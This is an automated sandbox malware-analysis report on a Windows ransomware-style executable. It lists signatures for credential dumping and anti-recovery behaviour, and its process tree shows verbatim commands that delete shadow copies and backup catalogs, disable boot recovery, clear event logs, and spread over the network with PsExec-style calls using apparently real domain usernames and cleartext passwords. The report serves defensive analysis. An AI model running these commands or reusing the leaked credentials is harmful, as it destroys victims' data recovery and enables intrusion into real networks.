Resubmissions

26-08-2024 09:41

240826-ln48csyerj 10

29-01-2022 07:52

220129-jqhe9sgcg5 10

Analysis

  • max time kernel
    141s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-08-2024 09:41

General

  • Target

    32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe

  • Size

    1.8MB

  • MD5

    59c3f3f99f44029de81293b1e7c37ed2

  • SHA1

    fb07496900468529719f07ed4b7432ece97a8d3d

  • SHA256

    32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471

  • SHA512

    9b3bd8a76d754bf9c899111be986c4fd6d14f6993a9a0e3dcd9b4a76c0f7764ac8798f5cbc7a0467c1562638d85bf52f627bd32c125f587b1e838beaf03c8a0e

  • SSDEEP

    49152:aIuQjMgjzus3wLNlDXjUoXFhKoT2iG6xQQqOeaGcWRrLy3pN+:a1bgjyQwhlDFEi5Qt7aGdRrLy5N

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Clears Windows event logs 1 TTPs 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
    "C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4536
    • C:\Users\Admin\AppData\Local\Temp\rdqwf.exe
      123 \\.\pipe\C701C2CA-4EC7-41DB-BCAC-24F8A822EC1B
      2⤵
      • Executes dropped EXE
      PID:4804
    • C:\Users\Admin\AppData\Local\Temp\wgaxl.exe
      123 \\.\pipe\FDA54272-3FCC-427A-88B9-AFAC565D5897
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2196
    • C:\Users\Admin\AppData\Local\Temp\_lvd.exe
      "C:\Users\Admin\AppData\Local\Temp\_lvd.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:992
        • \??\c:\Windows\system32\vssadmin.exe
          c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\system32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:3840
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4828
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl System
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:1164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4472
        • C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Security
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:4772
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:1524
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3240
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1148
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:32
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:1724
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:448
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:5064
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:1980
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3648
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:296
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:5068
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3356
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2460
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5092
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1524
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4756
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:2832
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1140
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4352
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1608
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2284
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3356
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3032
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2460
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3400
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4488
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4008
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3000
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3252
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3640
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:4040
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1432
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2280
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:4488
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:4944
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3108
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1612
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4828
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3640
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4188
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:5092
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:2460
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\static.170.76.243.136.clients.your-server.de -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:2332
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1264
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:4488
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4956
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1768
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4432
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3424
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3356
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:1980
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:308
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3452
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4040
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5092
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3944
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:1876
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      PID:3648
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\mdns.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3700
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1724
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.251 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3000
    • C:\Users\Admin\AppData\Local\Temp\_her.exe
      C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
      2⤵
        PID:424
      • C:\Users\Admin\AppData\Local\Temp\_her.exe
        C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3984
      • C:\Users\Admin\AppData\Local\Temp\_her.exe
        C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2368
      • C:\Users\Admin\AppData\Local\Temp\_her.exe
        C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2768
      • C:\Users\Admin\AppData\Local\Temp\_her.exe
        C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
        2⤵
          PID:4904
        • C:\Users\Admin\AppData\Local\Temp\_her.exe
          C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:5108
        • C:\Users\Admin\AppData\Local\Temp\_her.exe
          C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2404
        • C:\Users\Admin\AppData\Local\Temp\_her.exe
          C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
          2⤵
            PID:4220
